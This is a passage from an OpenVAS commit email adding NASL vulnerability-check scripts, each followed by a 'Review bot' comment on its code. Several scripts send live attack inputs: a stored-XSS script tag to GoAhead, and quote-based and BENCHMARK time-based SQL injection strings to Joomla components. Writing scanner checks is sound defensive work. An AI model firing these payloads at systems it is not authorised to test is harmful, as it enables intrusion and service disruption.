[Openvas-commits] r12061 - trunk/openvas-plugins/scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Wed Nov 9 14:03:18 CET 2011
Author: antu123
Date: 2011-11-09 14:03:16 +0100 (Wed, 09 Nov 2011)
New Revision: 12061
Added:
trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
Log:
Added new plugins
Added: trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_etherape_rpc_call_parsing_dos_vuln.nasl 17841 2011-11-09 17:22:20Z nov $
+#
+# EtherApe RPC Packet Processing Denial of Service Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802340);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2011-3369");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-08 17:22:20 +0530 (Tue, 08 Nov 2011)");
+ script_name("EtherApe RPC Packet Processing Denial of Service Vulnerability");
+ desc = "
+ Overview: This host is installed with EtherApe and is prone to denial of
+ service vulnerabilities.
+
+ Vulnerability Insight:
+ The flaw is due to an error in the add_conversation function in
+ 'conversations.c' when processing specially crafted RPC packet.
+
+ Impact:
+ Successful exploitation allows remote attackers to cause a NULL pointer
+ dereference or cause a denial of service.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ EtherApe version prior to 0.9.12
+
+ Fix: Upgrade to EtherApe version 0.9.12 or later,
+ For updates refer, http://etherape.sourceforge.net/
+
+ References:
+ http://osvdb.org/show/osvdb/75609
+ http://secunia.com/advisories/45989
+ http://etherape.sourceforge.net/NEWS.html
+ http://www.openwall.com/lists/oss-security/2011/09/19/4
+ http://www.openwall.com/lists/oss-security/2011/09/22/1
+ http://sourceforge.net/tracker/?func=detail&aid=3309061&group_id=2712&atid=102712 ";
+
+ script_description(desc);
+ script_summary("Check for the version of EtherApe");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Denial of Service");
+ exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+ exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+ exit(0);
+}
+
+etherapeName = find_file(file_name:"etherape", file_path:"/", useregex:TRUE,
+ regexpar:"$", sock:sock);
+
+foreach binaryName (etherapeName)
+{
+ ## Get the EtherApe version from command
+ etherVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+ ver_pattern:"GNOME EtherApe ([0-9.]+)", sock:sock);
+
+ if(etherVer[1])
+ {
+ ## Check for EtherApe Version less than 0.9.12
+ if(version_is_less(version:etherVer[1], test_version:"0.9.12"))
+ {
+ security_warning(0);
+ ssh_close_connection();
+ exit(0);
+ }
+ }
+}
+
+ssh_close_connection();
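Review bot: The `"Linux" >!< result` branch exits without closing the SSH session obtained from `ssh_login_or_reuse_connection()`, while the other two exit paths (after `security_warning(0)` and at the end of the script) call `ssh_close_connection()` first. Make that branch `if("Linux" >!< result){ ssh_close_connection(); exit(0); }` so the connection is released on every path. The comment above it also has a typo: `instslled` should be `installed`.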
Added: trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,110 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_goahead_webserver_mult_stored_xss_vuln.nasl 18413 2011-11-08 16:16:16Z nov $
+#
+# GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802270);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2011-4273");
+ script_bugtraq_id(50039);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"creation_date", value:"2011-11-08 16:16:16 +0530 (Tue, 08 Nov 2011)");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_name("GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities");
+ desc = "
+ Overview: This host is running GoAhead Webserver and is prone to multiple
+ stored cross site scripting vulnerabilities.
+
+ Vulnerability Insight:
+ Multiple flaws are caused due to improper validation of user-supplied input
+ via the 'group' parameter to goform/AddGroup, related to addgroup.asp,
+ the 'url' parameter to goform/AddAccessLimit, related to addlimit.asp,
+ or the 'user' or 'group' parameter to goform/AddUser, related to adduser.asp
+
+ Impact:
+ Successful exploitation will allow remote attackers to insert arbitrary HTML
+ and script code, which will be executed in a user's browser session in the
+ context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ GoAhead Webserver version 2.18
+
+ Fix: No solution or patch is available as on 8th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+ References:
+ http://osvdb.org/show/osvdb/76845
+ http://osvdb.org/show/osvdb/76846
+ http://osvdb.org/show/osvdb/76847
+ http://www.kb.cert.org/vuls/id/384427 ";
+
+ script_description(desc);
+ script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("Web Servers");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+ exit(0);
+}
+
+## Stored XSS (Not a safe check)
+if(safe_checks()){
+ exit(0);
+}
+
+## Construct Attack Request
+req = http_post(port:port, item:"/goform/AddGroup/addgroup.asp",
+ data:"group=<script>alert(doucment.cookie)</script>" +
+ "&privilege=4&method=1&enabled=on&ok=OK");
+## Try XSS Attack
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit worked by checking the response
+if("<script>alert(doucment.cookie)</script>" >< res){
+ security_warning(port);
+}
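Review bot: The confirmation only searches the reply to the POST for the marker that was just submitted, so a build that simply echoes the rejected or accepted `group` value in its immediate response will match without anything having been stored; for a check labelled stored XSS this cannot distinguish reflection from persistence, and a comment should say the result is based on the POST reply alone. The request also creates a group entry carrying the marker in the target's configuration and nothing removes it; the `safe_checks()` gate is right, but document the side effect, e.g. `## NOTE: this request creates a persistent group entry on the target; it is not removed afterwards`. If the misspelling `doucment` in the marker is deliberate (a unique token rather than a working script), a one-line comment saying so would stop a later "fix" from changing only one of the two occurrences and breaking the match.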
Added: trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,128 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_mult_components_sql_inj_vuln.nasl 17758 2011-11-09 15:10:29 nov $
+#
+# Joomla Multiple Components SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802196);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2010-4927", "CVE-2010-4928", "CVE-2010-4929", "CVE-2010-4937",
+ "CVE-2010-4945", "CVE-2010-4902", "CVE-2010-4865", "CVE-2010-4902");
+ script_bugtraq_id(43319, 33254, 43415, 42334, 42986, 43605,42986);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-03 15:42:01 +0200 (Thu, 03 Nov 2011)");
+ script_name("Joomla Multiple Components SQL Injection Vulnerabilities");
+ desc = "
+ Overview: This host is running Joomla with multiple components and is
+ prone to SQL injection vulnerabilities.
+
+ Vulnerability Insight:
+ For more information about vulnerability refer the references section.
+
+ Impact:
+ Successful exploitation will let attackers to manipulate SQL queries by
+ injecting arbitrary SQL code.
+
+ Impact Level: Application.
+
+ Affected Software/OS:
+ Joomla Joostina component
+ Joomla sgicatalog component
+ Joomla Amblog component version 1.0
+ Joomla Clantools Component version 1.2.3
+ Joomla CamelcityDB component version 2.2
+ Joomla Clantools Component version 1.2.3
+ Joomla Restaurant Guide component version 1.0.0
+ Joomla Aardvertiser Component versions 2.1 and 2.1.1
+
+ Fix: For solution or patch refer the refer section.
+ For updates refer, http://extensions.joomla.org/extensions/
+
+ References:
+ http://secunia.com/advisories/40932
+ http://secunia.com/advisories/41322
+ http://xforce.iss.net/xforce/xfdb/62151
+ http://www.exploit-db.com/exploits/14530/
+ http://www.exploit-db.com/exploits/14596/
+ http://www.exploit-db.com/exploits/14530/
+ http://www.exploit-db.com/exploits/15040/
+ http://www.exploit-db.com/exploits/15157/
+ http://www.exploit-db.com/exploits/14902/
+ http://packetstormsecurity.org/files/92305/joomlacamelcitydb2-sql.txt
+ http://packetstormsecurity.org/files/view/105704/joomlasgicatalog-sql.txt ";
+
+ script_description(desc);
+ script_summary("Check if Joomla components are vulnerable for SQL injection attack");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("joomla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+ exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+ exit(0);
+}
+
+## Make list of vulnerable pages
+pages = make_list("/index.php?option=com_restaurantguide&view=country&id='&Itemid=69",
+ "/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode='",
+ "/index.php?option=com_amblog&task=editsave&articleid='",
+ "/index.php?option=com_camelcitydb2&view=all&Itemid=15",
+ "/index.php?option=com_jeguestbook&view=item_detail&d_itemid='",
+ "/index.php?option=com_clantools&squad='",
+ "'/index.php?option=com_sgicatalog&task=view&lang=en&id='",
+ "/index.php?option=com_aardvertiser&cat_name='x+AND+'1'='1&task=view");
+
+foreach page (pages)
+{
+ if(http_vuln_check(port:joomlaPort, url: joomlaDir + page, pattern: "<b>" +
+ "Warning</b>: Invalid argument supplied for foreach\(\)") ||
+ (http_vuln_check(port:joomlaPort, url:joomlaDir + page, pattern:"You have an error in " +
+ "your SQL syntax;")))
+ {
+ security_warning(joomlaPort);
+ exit(0);
+ }
+}
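Review bot: The seventh entry of the `pages` list starts with a stray apostrophe, `"'/index.php?option=com_sgicatalog...`, so after concatenation with `joomlaDir` the request is sent to `<dir>'/index.php?...` and the com_sgicatalog case can never match; it should read `"/index.php?option=com_sgicatalog&task=view&lang=en&id='",`. Each page is also requested twice because `http_vuln_check` is called once per pattern; a single call with an alternation, `pattern:"(Invalid argument supplied for foreach\(\)|You have an error in your SQL syntax;)"`, halves the traffic to the target. Metadata is duplicated: `CVE-2010-4902` appears twice in `script_cve_id`, BID `42986` twice in `script_bugtraq_id`, and the Clantools line and the exploit-db/14530 reference twice in `desc`. This script is rated High/7.5 like gb_joomla_teams_sql_inj_vuln.nasl in the same commit but reports with `security_warning` where that one uses `security_hole`; pick one for consistency.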
Added: trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,113 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_teams_sql_inj_vuln.nasl 17758 2011-11-09 13:10:29 nov $
+#
+# Joomla 'Teams' Component SQL Injection Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802189);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2010-4941");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-09 13:02:45 +0530 (Wed, 09 Nov 2011)");
+ script_name("Joomla 'Teams' Component SQL Injection Vulnerability");
+ desc = "
+ Overview: This host is running Joomla with Teams component and is prone to
+ SQL injection vulnerability.
+
+ Vulnerability Insight:
+ Input passed via the 'PlayerID' parameter to 'index.php' is not properly
+ sanitised before being used in SQL queries.
+
+ Impact:
+ Successful exploitation will let attackers to manipulate SQL queries by
+ injecting arbitrary SQL code.
+
+ Impact Level: Application.
+
+ Affected Software/OS:
+ Joomla Team Component version 1_1028_100809_1711
+
+ Fix: No solution or patch is available as on 08th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://joomla-clantools.de/downloads/cat_view/34-komponenten.html
+
+ References:
+ http://secunia.com/advisories/40933
+ http://www.exploit-db.com/exploits/14598/
+ http://www.securityfocus.com/archive/1/archive/1/512974/100/0/threaded ";
+
+ script_description(desc);
+ script_summary("Check if Joomla Teams component is vulnerable for SQL Injection attack");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("joomla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+ exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+ exit(0);
+}
+
+## Try an exploit
+filename = string(joomlaDir + "/index.php");
+host = get_host_name();
+postData = "FirstName=OpenVAS-SQL-Test&LastName=SecPod&Notes=sds&TeamNames" +
+ "[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT" +
+ "(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&" +
+ "task=save&controller=player";
+
+## Construct post request
+sndReq = string("POST ", filename, " HTTP/1.1\r\n",
+ "Host: ", host, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(postData), "\r\n\r\n",
+ postData);
+rcvRes = http_keepalive_send_recv(port:joomlaPort, data:sndReq);
+
+## Confirm the exploit
+if("OpenVAS-SQL-Test" >< rcvRes && "SecPod" >< rcvRes){
+ security_hole(joomlaPort);
+}
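Review bot: The confirmation `"OpenVAS-SQL-Test" >< rcvRes && "SecPod" >< rcvRes` only checks that the posted FirstName/LastName values are echoed back, which any form that re-renders its input will do regardless of the injection, so the `security_hole` result is not actually tied to the vulnerability and the script should at least carry a comment stating that the evidence is an echo of the submitted fields. In addition the `PlayerID` payload runs `BENCHMARK(99999999, ...)` against the target's database, a deliberate CPU burn, yet unlike the GoAhead script in this commit there is no `safe_checks()` gate; add `if(safe_checks()){ exit(0); }` before `postData` is built, since `ACT_ATTACK` alone does not provide that. The `desc` also names the product "Team Component" while the title says 'Teams'.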
Added: trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_truetype_font_privilege_elevation_vuln.nasl 18377 2011-11-07 16:44:35Z nov $
+#
+# Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802500);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2011-3402");
+ script_bugtraq_id(50462);
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-07 16:44:35 +0530 (Mon, 07 Nov 2011)");
+ script_name("Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability");
+ desc = "
+ Overview:
+ The host is installed with Microsoft Windows operating system and is prone to
+ pivilege escalation vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to due to an error within the Win32k kernel-mode
+ driver when parsing TrueType fonts.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code with
+ kernel-level privileges. Failed exploit attempts may result in a
+ denial-of-service condition.
+
+ Impact Level: System
+
+ Affected Software/OS:
+ Microsoft Windows 7 Service Pack 1 and prior
+ Microsoft Windows XP Service Pack 3 and prior
+ Microsoft Windows Vista Service Pack 2 and prior
+ Microsoft Windows Server 2008 Service Pack 2 and prior
+ Microsoft Windows server 2003 Service Pack 2 and prior
+
+ Fix: Apply the workaround from below link,
+ http://support.microsoft.com/kb/2639658
+
+ References:
+ http://secunia.com/advisories/46724/
+ http://support.microsoft.com/kb/2639658
+ http://technet.microsoft.com/en-us/security/advisory/2639658 ";
+
+ script_description(desc);
+ script_summary("Check if t2embed.dll is accessible");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Windows");
+ script_dependencies("secpod_reg_enum.nasl");
+ script_require_ports(139, 445);
+ exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+include("secpod_smb_func.inc");
+
+## Check for OS
+if(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){
+ exit(0);
+}
+
+## Get System Path
+sysPath = smb_get_systemroot();
+if(!sysPath ){
+ exit(0);
+}
+
+dllPath = sysPath + "\system32\t2embed.dll";
+
+## Exit if file does not exist
+if(!dllPath){
+ exit(0);
+}
+
+share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath);
+file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:dllPath);
+
+## Check if file is accessible by checking its size
+dllSize = get_file_size(file:file, share:share);
+if(dllSize != NULL){
+ security_hole(0);
+}
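Review bot: The block under `## Exit if file does not exist`, `if(!dllPath){ exit(0); }`, can never fire because `dllPath` was just assigned a non-empty concatenation, so it is dead code and its comment misdescribes what is checked; the real accessibility test is the `get_file_size` call, so delete those four lines and put the intent there, e.g. `## Report when t2embed.dll is still readable over SMB, which presumably means the KB 2639658 workaround has not been applied`. Minor: `if(!sysPath )` has a stray space, and the `desc` string has the typo `pivilege`.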
Added: trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,98 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 18420 2011-11-08 13:11:11Z nov $
+#
+# PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802504);
+ script_version("$Revision: $");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-08 13:11:11 +0530 (Tue, 08 Nov 2011)");
+ script_cve_id("CVE-2011-3379");
+ script_bugtraq_id(49754);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)");
+ desc = "
+ Overview: This host is installed with PHP and is prone to remote arbitrary
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in 'is_a()' function. It receives strings as
+ first argument, which can lead to the '__autoload()' function being called
+ unexpectedly and do not properly verify input in their '__autoload()'
+ function, which leads to an unexpected attack vectors.
+
+ Impact:
+ Successful exploitation could allow remote attackers to execute arbitrary PHP
+ code by including arbitrary files from remote resources.
+
+ Impact Level: Application/System
+
+ Affected Software/OS:
+ PHP Version 5.3.7 and 5.3.8 on windows.
+
+ Fix: No solution or patch is available as on 8th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://php.net/downloads.php
+
+ Workaround:
+ Apply the workaround for PHP from below link,
+ http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/
+
+ *****
+ NOTE : Ignore this warning, if above workaround has been applied.
+ *****
+
+ References:
+ http://secunia.com/advisories/46107/
+ https://bugzilla.redhat.com/show_bug.cgi?id=741020
+ http://www.securityfocus.com/archive/1/519770/30/0/threaded
+ http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/ ";
+
+ script_description(desc);
+ script_summary("Check for the version of PHP");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("General");
+ script_dependencies("secpod_php_detect_win.nasl");
+ script_require_keys("PHP/Ver/win");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get version from KB
+phpVer = get_kb_item("PHP/Ver/win");
+
+if(phpVer != NULL)
+{
+ ##Check for PHP version
+ if(version_is_equal(version:phpVer, test_version:"5.3.7") ||
+ version_is_equal(version:phpVer, test_version:"5.3.8")){
+ security_hole(0);
+ }
+}
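Review bot: The `if(phpVer != NULL)` guard is redundant with `script_require_keys("PHP/Ver/win")`, which already keeps the script from running when the key is absent, and the two `version_is_equal` calls can become one `version_in_range(version:phpVer, test_version:"5.3.7", test_version2:"5.3.8")` from the already included version_func.inc. Since `desc` tells the user to ignore the warning once the workaround is applied, a comment on the check should make that limitation explicit for maintainers, e.g. `## Version-only check: cannot detect whether the __autoload() workaround from desc has been applied`.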
Added: trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_webfilebrowser_file_download_vuln.nasl 18358 2011-11-08 17:09:26Z nov $
+#
+# Web File Browser 'act' Parameter File Download Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802341);
+ script_version("$Revision: $");
+ script_bugtraq_id(50508);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-08 17:09:26 +0530 (Tue, 08 Nov 2011)");
+ script_name("Web File Browser 'act' Parameter File Download Vulnerability");
+ desc = "
+ Overview:
+ This host is running with Web File Browser and is prone to file download
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to input validation error in 'act' parameter in
+ 'webFileBrowser.php', which allows attackers to download arbitrary files
+ via a '../'(dot dot) sequences.
+
+ Impact:
